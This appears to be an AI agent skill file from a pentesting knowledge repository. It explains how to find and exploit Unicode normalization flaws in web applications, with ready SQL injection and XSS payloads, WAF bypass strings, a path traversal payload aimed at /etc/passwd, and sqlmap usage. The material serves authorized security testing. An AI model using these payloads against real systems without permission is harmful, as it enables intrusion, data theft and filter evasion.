Hacktricks-skills unicode-normalization-pentest
How to identify and exploit Unicode normalization vulnerabilities in web applications. Use this skill whenever you're testing for SQL injection bypass, XSS, WAF evasion, or input validation issues that might be affected by Unicode normalization. Trigger this when you see reflected input, need to bypass character filters, or want to test for normalization-based security flaws. Don't forget to use this for any input validation testing, especially when the application echoes user input or uses regex-based filtering.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/unicode-injection/unicode-normalization/SKILL.MD
Unicode Normalization Pentesting
This skill helps you identify and exploit Unicode normalization vulnerabilities in web applications. These vulnerabilities occur when applications normalize Unicode input at different stages of processing, potentially bypassing security filters.
Quick Detection Test
Start with the Kelvin Sign test to detect if normalization is happening:
- Send KELVIN SIGN (U+212A), encoded as %e2%84%aa, to any input field
- If the application echoes back a plain ASCII K (U+004B), Unicode normalization is being performed
- This indicates potential for normalization-based bypass attacks
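The check above can be sketched in Python. This is a minimal illustration, not part of the original skill: `looks_normalized` is a hypothetical helper, and it assumes you pass it only the reflected value, not a whole page that may contain other K characters.

```python
import unicodedata
from urllib.parse import quote

KELVIN_SIGN = "\u212a"  # KELVIN SIGN, visually close to ASCII K

# Percent-encoded UTF-8 bytes to place in the request parameter.
probe = quote(KELVIN_SIGN).lower()


def looks_normalized(reflected: str) -> bool:
    """Hypothetical helper: True if the reflected value holds ASCII K
    and the original Kelvin sign is gone."""
    return "K" in reflected and KELVIN_SIGN not in reflected


print(probe)  # %e2%84%aa

# Simulate a backend that normalizes before echoing the value back.
echoed = unicodedata.normalize("NFC", KELVIN_SIGN)
print(looks_normalized(echoed))  # True
```

The Kelvin sign is a convenient probe because it maps to K under all four normalization forms, so a positive result does not yet tell you which form is in use.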
Understanding the Vulnerability
How It Works
Applications may normalize Unicode input at different processing stages:
- Before filtering: Normalization happens first, then security filters run
- After filtering: Filters run first, then normalization creates new characters
- Inconsistent normalization: Different parts of the app use different algorithms
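The difference between the first two orderings can be sketched as follows. Both functions and the `BLOCKED` set are hypothetical stand-ins for an application's input handling, and NFKC is assumed as the normalization form.

```python
import unicodedata

# Hypothetical blocklist standing in for the application's filter.
BLOCKED = {"'", '"', "<", ">"}


def filter_then_normalize(value: str) -> str:
    """Exploitable order: the blocklist runs before NFKC normalization."""
    if any(ch in BLOCKED for ch in value):
        raise ValueError("blocked character")
    return unicodedata.normalize("NFKC", value)


def normalize_then_filter(value: str) -> str:
    """Safer order: the blocklist sees the normalized text."""
    normalized = unicodedata.normalize("NFKC", value)
    if any(ch in BLOCKED for ch in normalized):
        raise ValueError("blocked character")
    return normalized


payload = "\uff07 or 1=1-- "  # starts with FULLWIDTH APOSTROPHE (U+FF07)

# The filter sees no ASCII quote, but normalization creates one afterward.
print(filter_then_normalize(payload))

try:
    normalize_then_filter(payload)
except ValueError as exc:
    print("rejected:", exc)
```

Only the filter-then-normalize order lets the quote through, which is why determining the order matters before crafting payloads.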
The Four Normalization Forms
| Form | Description | Use Case |
|---|---|---|
| NFC | Canonical composition | Most common default |
| NFD | Canonical decomposition | Breaks characters into base + combining |
| NFKC | Compatibility composition | Converts compatibility characters |
| NFKD | Compatibility decomposition | Full compatibility breakdown |
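To see how the four forms differ in practice, the sketch below normalizes three sample characters with Python's standard `unicodedata` module and prints the resulting code points. The sample set and the `normalize_all` helper are illustrative choices, not part of the original skill.

```python
import unicodedata

FORMS = ("NFC", "NFD", "NFKC", "NFKD")

# Illustrative samples: a canonical singleton, a precomposed letter,
# and a compatibility character.
samples = {
    "KELVIN SIGN": "\u212a",
    "LATIN SMALL LETTER E WITH ACUTE": "\u00e9",
    "FULLWIDTH APOSTROPHE": "\uff07",
}


def normalize_all(text: str) -> dict:
    """Return the text under each of the four normalization forms."""
    return {form: unicodedata.normalize(form, text) for form in FORMS}


for name, ch in samples.items():
    shown = {
        form: [f"U+{ord(c):04X}" for c in out]
        for form, out in normalize_all(ch).items()
    }
    print(name, shown)
```

The canonical forms (NFC, NFD) leave the fullwidth apostrophe untouched, while the compatibility forms (NFKC, NFKD) fold it to ASCII. Most of the filter-bypass characters in this skill therefore depend on the target using NFKC or NFKD.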
Attack Vectors
1. SQL Injection Filter Bypass
When applications filter dangerous characters but normalize afterward:
Target: Single quote ' (0x27)
- Unicode equivalent: ＇ (FULLWIDTH APOSTROPHE, U+FF07), encoded as %ef%bc%87
Payloads:
    # Single quote injection
    %ef%bc%87+or+1=1--+
    # With Unicode equivalents for all characters
    %ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3
    # Double quote variant
    %ef%bc%82+or+1=1--+
    # OR operator bypass
    %ef%bc%87+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f
Key Unicode Mappings:
    ' → %ef%bc%87 (FULLWIDTH APOSTROPHE, U+FF07)
    " → %ef%bc%82 (FULLWIDTH QUOTATION MARK, U+FF02)
    | → %ef%bd%9c (FULLWIDTH VERTICAL LINE, U+FF5C)
    / → %ef%bc%8f (FULLWIDTH SOLIDUS, U+FF0F)
    - → %ef%b9%a3 (SMALL HYPHEN-MINUS, U+FE63)
    = → %e2%81%bc (SUPERSCRIPT EQUALS SIGN, U+207C)
    1 → %c2%b9 (SUPERSCRIPT ONE, U+00B9)
    # → %ef%b9%9f (SMALL NUMBER SIGN, U+FE5F)
    * → %ef%b9%a1 (SMALL ASTERISK, U+FE61)
    O → %e1%b4%bc (MODIFIER LETTER CAPITAL O, U+1D3C)
    R → %e1%b4%bf (MODIFIER LETTER CAPITAL R, U+1D3F)
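The mappings above can be applied mechanically. The following sketch builds a percent-encoded payload from an ASCII one and confirms that NFKC folds it back; `SUBSTITUTES`, `to_unicode_payload`, and `url_encode` are hypothetical names introduced for illustration, and the target is assumed to apply NFKC or NFKD.

```python
import unicodedata
from urllib.parse import quote_plus

# ASCII character -> compatibility character that NFKC/NFKD folds back to it.
SUBSTITUTES = {
    "'": "\uff07", '"': "\uff02", "|": "\uff5c", "/": "\uff0f",
    "-": "\ufe63", "=": "\u207c", "1": "\u00b9", "#": "\ufe5f",
    "*": "\ufe61", "O": "\u1d3c", "R": "\u1d3f",
}


def to_unicode_payload(ascii_payload: str) -> str:
    """Swap each mapped ASCII character for its compatibility equivalent."""
    return "".join(SUBSTITUTES.get(ch, ch) for ch in ascii_payload)


def url_encode(payload: str) -> str:
    """Percent-encode as UTF-8, with spaces written as '+'."""
    return quote_plus(payload)


original = "' OR 1=1-- -"
disguised = to_unicode_payload(original)

print(url_encode(disguised).lower())
# Sanity check: NFKC turns the disguised payload back into the original.
print(unicodedata.normalize("NFKC", disguised) == original)  # True
```

Characters without an entry in the table pass through unchanged, so extending coverage only requires adding verified pairs to `SUBSTITUTES`.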
2. XSS Bypass
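Use Unicode characters that normalize to characters with special meaning in HTML. For example, U+226E (NOT LESS-THAN), encoded as %e2%89%ae, decomposes under NFD and NFKD into < (U+003C) followed by U+0338 (COMBINING LONG SOLIDUS OVERLAY).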
Example payloads:
    <script>alert(1)</script>
    %e2%89%ae%3Cscript%3Ealert(1)%3C/script%3E
    %u226e%3Cscript%3Ealert(1)%3C/script%3E
Special K Polyglot:
    %F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83
    # Normalizes to: Leonishan (under NFKC or NFKD)
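Both XSS-related strings above can be checked locally before sending them. This sketch uses only the standard library; the variable names are illustrative.

```python
import unicodedata
from urllib.parse import unquote

# U+226E NOT LESS-THAN, as sent on the wire.
not_less_than = unquote("%e2%89%ae")

# Decomposing forms split it into '<' plus a combining overlay.
decomposed = unicodedata.normalize("NFD", not_less_than)
print([f"U+{ord(c):04X}" for c in decomposed])  # ['U+003C', 'U+0338']

# Composing forms put it back together, so no '<' appears.
recomposed = unicodedata.normalize("NFKC", not_less_than)
print("<" in recomposed)  # False

# The styled string folds to plain ASCII under compatibility forms.
styled = unquote(
    "%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88"
    "%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83"
)
print(unicodedata.normalize("NFKC", styled))  # Leonishan
```

The first check shows that the NOT LESS-THAN trick only yields a literal < when the target applies a decomposing form (NFD or NFKD).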
3. Regex Fuzzing
When regex validation normalizes input but the actual usage doesn't:
Use recollapse tool:
    # Generate variations of input to fuzz backend
    pip install recollapse
    recollapse "https://example.com/path"
Test for:
- Open Redirect vulnerabilities
- SSRF through URL validation bypass
- Path traversal through normalized characters
4. Unicode Overflow
Exploit byte overflow to create unexpected ASCII characters:
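Example: Code points that overflow to A (0x41):
- 0x4e41 → A
- 0x4f41 → A
- 0x5041 → A
- 0x5141 → A
Technique: Send code points whose lowest byte equals your target character. If the backend truncates each code point to a single byte, only that low byte survives (for example, 0x4e41 becomes 0x41, which is A).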
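The arithmetic behind the overflow can be sketched as below. The helper names are hypothetical, and the model assumes the backend keeps only the low 8 bits of each code point, which is the behavior the examples above describe.

```python
def overflow_candidates(target: str, count: int = 4, start_high: int = 0x4E) -> list:
    """Return code points whose lowest byte equals the target's byte value."""
    low = ord(target)
    if low > 0xFF:
        raise ValueError("target must fit in a single byte")
    return [(high << 8) | low for high in range(start_high, start_high + count)]


def truncate_to_byte(code_point: int) -> str:
    """Model a backend that stores only the low 8 bits of a code point."""
    return chr(code_point & 0xFF)


for cp in overflow_candidates("A"):
    print(f"0x{cp:04x} -> {truncate_to_byte(cp)}")
```

Changing `start_high` selects a different block of candidates, which helps when the target rejects some scripts but accepts others.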
Testing Workflow
Step 1: Reconnaissance
- Identify reflected parameters: Find input fields that echo back to output
- Test Kelvin Sign: Send %e2%84%aa and check for K in response
- Check normalization behavior: Compare responses with different Unicode forms
Step 2: Filter Analysis
- Identify blocked characters: Test common dangerous characters (', ", <, >, etc.)
- Test Unicode equivalents: Replace blocked chars with Unicode variants
- Check normalization timing: Determine if normalization happens before or after filtering
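For the "Test Unicode equivalents" step, candidate replacements can be enumerated rather than looked up by hand. The sketch below scans code points for characters that normalize exactly to a blocked character; `find_equivalents` is a hypothetical helper, and the results depend on the Unicode version bundled with your Python build, which may differ from the target's.

```python
import unicodedata


def find_equivalents(target: str, form: str = "NFKC", limit: int = 0x110000) -> list:
    """Return characters other than target that normalize exactly to target."""
    matches = []
    for cp in range(limit):
        if 0xD800 <= cp <= 0xDFFF:  # surrogates are not valid scalar values
            continue
        ch = chr(cp)
        if ch != target and unicodedata.normalize(form, ch) == target:
            matches.append(ch)
    return matches


# Scan only the Basic Multilingual Plane here to keep the run short.
for blocked in ("'", '"', "<", ">"):
    hits = find_equivalents(blocked, limit=0x10000)
    print(repr(blocked), [f"U+{ord(c):04X}" for c in hits])
```

Running the scan once per normalization form gives a per-form candidate list, which pairs naturally with the timing check in the last bullet.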
Step 3: Exploitation
- Craft payloads: Use Unicode equivalents for your attack vectors
- Test with sqlmap: Use the Unicode template for automated testing
- Manual verification: Confirm the vulnerability works as expected
Step 4: Verification
- Confirm bypass: Verify the attack succeeds through normalization
- Document findings: Record which Unicode forms work
- Test edge cases: Try different normalization forms (NFC, NFD, NFKC, NFKD)
Tools and Resources
sqlmap Unicode Template
    # Clone the template
    git clone https://github.com/carlospolop/sqlmap_to_unicode_template
    # Use with sqlmap
    python sqlmap_to_unicode.py -u "http://target.com/page?id=1"
recollapse
    # Generate input variations
    pip install recollapse
    recollapse "input_string"
Reference Tables
Common Scenarios
WAF Bypass
When a WAF filters specific characters but the application normalizes afterward:
    # Original blocked payload
    ' OR 1=1--
    # Unicode bypass
    %ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3
Input Validation Bypass
When validation checks for specific patterns but normalizes before use:
    # Blocked:
    <script>
    # Bypass:
    %e2%89%ae%3Cscript%3E
Path Traversal
When path validation is bypassed through Unicode:
    # Normal:
    ../../../etc/passwd
    # Unicode (%c0%af is an overlong UTF-8 encoding of /; the dots stay as-is):
    ..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
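The %c0%af sequence relies on overlong UTF-8 decoding rather than on a normalization form, so it only works against lenient decoders. The sketch below contrasts a hypothetical lenient two-byte decoder with Python's strict one; both helper functions are illustrative.

```python
def decode_two_byte_lenient(b1: int, b2: int) -> str:
    """Decode a 2-byte UTF-8 sequence without rejecting overlong forms."""
    if b1 & 0xE0 != 0xC0 or b2 & 0xC0 != 0x80:
        raise ValueError("not a 2-byte UTF-8 sequence")
    # Take 5 payload bits from the lead byte and 6 from the continuation byte.
    return chr(((b1 & 0x1F) << 6) | (b2 & 0x3F))


def strict_rejects(raw: bytes) -> bool:
    """True if Python's strict UTF-8 decoder refuses the bytes."""
    try:
        raw.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return False


print(decode_two_byte_lenient(0xC0, 0xAF))  # /
print(strict_rejects(b"\xc0\xaf"))  # True
```

A strict decoder rejecting the bytes, as Python does here, means the payload is only worth trying when some component in the chain decodes leniently.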
Best Practices
- Always test normalization: Include Unicode tests in your standard pentest workflow
- Document normalization behavior: Record which forms the application uses
- Test all input vectors: Forms, URLs, headers, cookies, JSON bodies
- Consider encoding layers: URL encoding + Unicode encoding combinations
- Check for inconsistent normalization: Different parts of the app may normalize differently